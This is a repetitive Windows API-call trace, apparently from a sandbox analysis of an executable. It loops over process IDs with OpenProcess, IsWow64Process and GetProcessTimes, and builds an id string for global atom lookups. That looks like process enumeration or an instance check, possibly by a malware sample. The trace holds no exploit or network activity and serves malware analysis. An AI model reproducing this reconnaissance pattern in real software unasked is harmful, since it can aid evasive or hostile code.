	[0093.840] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.840] CloseHandle (hObject=0x248) returned 1
	[0093.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0093.840] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.840] CloseHandle (hObject=0x248) returned 1
	[0093.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0093.840] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.840] CloseHandle (hObject=0x248) returned 1
	[0093.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0093.841] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.841] CloseHandle (hObject=0x248) returned 1
	[0093.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0093.841] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.841] CloseHandle (hObject=0x248) returned 1
	[0093.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0093.841] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.841] CloseHandle (hObject=0x248) returned 1
	[0093.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0093.841] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.841] CloseHandle (hObject=0x248) returned 1
	[0093.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0093.841] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.841] CloseHandle (hObject=0x248) returned 1
	[0093.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0093.841] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.841] CloseHandle (hObject=0x248) returned 1
	[0093.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0093.842] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.842] CloseHandle (hObject=0x248) returned 1
	[0093.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0093.842] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.842] CloseHandle (hObject=0x248) returned 1
	[0093.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0093.842] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.842] CloseHandle (hObject=0x248) returned 1
	[0093.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0093.842] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.842] CloseHandle (hObject=0x248) returned 1
	[0093.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0093.842] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.842] CloseHandle (hObject=0x248) returned 1
	[0093.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0093.843] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.843] CloseHandle (hObject=0x248) returned 1
	[0093.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0093.843] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.843] CloseHandle (hObject=0x248) returned 1
	[0093.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0093.843] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.843] CloseHandle (hObject=0x248) returned 1
	[0093.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0093.843] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.843] CloseHandle (hObject=0x248) returned 1
	[0093.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0093.843] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0093.844] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0093.844] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0093.844] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0093.844] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0093.844] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0093.844] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0093.844] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0093.844] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0093.844] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0093.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0093.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0093.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0093.845] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.845] CloseHandle (hObject=0x248) returned 1
	[0093.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0093.845] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.845] CloseHandle (hObject=0x248) returned 1
	[0093.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0093.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0093.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0093.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0093.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0093.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0093.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0093.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0093.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0093.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0093.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0093.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0093.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0093.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0093.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0093.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0093.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0093.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0093.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0093.918] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.918] CloseHandle (hObject=0x248) returned 1
	[0093.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0093.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0093.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0093.919] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.919] CloseHandle (hObject=0x248) returned 1
	[0093.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0093.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0093.919] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.919] CloseHandle (hObject=0x248) returned 1
	[0093.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0093.919] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.919] CloseHandle (hObject=0x248) returned 1
	[0093.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0093.919] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.919] CloseHandle (hObject=0x248) returned 1
	[0093.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0093.920] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.920] CloseHandle (hObject=0x248) returned 1
	[0093.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0093.920] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.920] CloseHandle (hObject=0x248) returned 1
	[0093.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0093.920] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.920] CloseHandle (hObject=0x248) returned 1
	[0093.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0093.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0093.920] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.920] CloseHandle (hObject=0x248) returned 1
	[0093.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0093.920] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.920] CloseHandle (hObject=0x248) returned 1
	[0093.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0093.921] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.921] CloseHandle (hObject=0x248) returned 1
	[0093.921] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0093.921] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.921] CloseHandle (hObject=0x248) returned 1
	[0093.921] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0093.921] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.921] CloseHandle (hObject=0x248) returned 1
	[0093.921] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0093.921] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.921] CloseHandle (hObject=0x248) returned 1
	[0093.921] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0093.921] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.921] CloseHandle (hObject=0x248) returned 1
	[0093.921] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0093.921] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.921] CloseHandle (hObject=0x248) returned 1
	[0093.922] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0093.922] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.922] CloseHandle (hObject=0x248) returned 1
	[0093.922] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0093.922] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.922] CloseHandle (hObject=0x248) returned 1
	[0093.922] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0093.922] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.922] CloseHandle (hObject=0x248) returned 1
	[0093.922] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0093.922] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.922] CloseHandle (hObject=0x248) returned 1
	[0093.922] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0093.922] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.922] CloseHandle (hObject=0x248) returned 1
	[0093.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0093.923] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.923] CloseHandle (hObject=0x248) returned 1
	[0093.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0093.923] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.923] CloseHandle (hObject=0x248) returned 1
	[0093.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0093.923] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.923] CloseHandle (hObject=0x248) returned 1
	[0093.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0093.923] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.923] CloseHandle (hObject=0x248) returned 1
	[0093.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0093.923] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.923] CloseHandle (hObject=0x248) returned 1
	[0093.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0093.923] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.923] CloseHandle (hObject=0x248) returned 1
	[0093.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0093.924] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.924] CloseHandle (hObject=0x248) returned 1
	[0093.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0093.924] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.924] CloseHandle (hObject=0x248) returned 1
	[0093.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0093.924] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.924] CloseHandle (hObject=0x248) returned 1
	[0093.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0093.924] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.924] CloseHandle (hObject=0x248) returned 1
	[0093.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0093.925] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0093.925] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0093.925] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0093.925] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0093.925] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0093.925] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0093.925] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0093.925] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0093.925] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0093.925] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0093.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0093.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0093.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0093.926] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.926] CloseHandle (hObject=0x248) returned 1
	[0093.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0093.926] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.926] CloseHandle (hObject=0x248) returned 1
	[0093.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0094.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0094.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0094.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0094.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0094.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0094.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0094.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0094.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0094.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0094.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0094.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0094.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0094.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0094.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0094.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0094.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0094.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0094.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0094.002] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.002] CloseHandle (hObject=0x248) returned 1
	[0094.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0094.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0094.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0094.002] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.002] CloseHandle (hObject=0x248) returned 1
	[0094.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0094.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0094.002] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.002] CloseHandle (hObject=0x248) returned 1
	[0094.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0094.003] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.003] CloseHandle (hObject=0x248) returned 1
	[0094.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0094.003] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.003] CloseHandle (hObject=0x248) returned 1
	[0094.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0094.003] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.003] CloseHandle (hObject=0x248) returned 1
	[0094.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0094.003] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.003] CloseHandle (hObject=0x248) returned 1
	[0094.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0094.003] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.003] CloseHandle (hObject=0x248) returned 1
	[0094.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0094.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0094.004] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.004] CloseHandle (hObject=0x248) returned 1
	[0094.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0094.004] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.004] CloseHandle (hObject=0x248) returned 1
	[0094.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0094.004] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.004] CloseHandle (hObject=0x248) returned 1
	[0094.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0094.004] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.004] CloseHandle (hObject=0x248) returned 1
	[0094.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0094.004] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.004] CloseHandle (hObject=0x248) returned 1
	[0094.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0094.005] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.005] CloseHandle (hObject=0x248) returned 1
	[0094.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0094.005] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.005] CloseHandle (hObject=0x248) returned 1
	[0094.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0094.005] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.005] CloseHandle (hObject=0x248) returned 1
	[0094.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0094.005] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.005] CloseHandle (hObject=0x248) returned 1
	[0094.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0094.005] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.005] CloseHandle (hObject=0x248) returned 1
	[0094.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0094.005] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.005] CloseHandle (hObject=0x248) returned 1
	[0094.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0094.006] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.006] CloseHandle (hObject=0x248) returned 1
	[0094.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0094.006] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.006] CloseHandle (hObject=0x248) returned 1
	[0094.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0094.006] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.006] CloseHandle (hObject=0x248) returned 1
	[0094.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
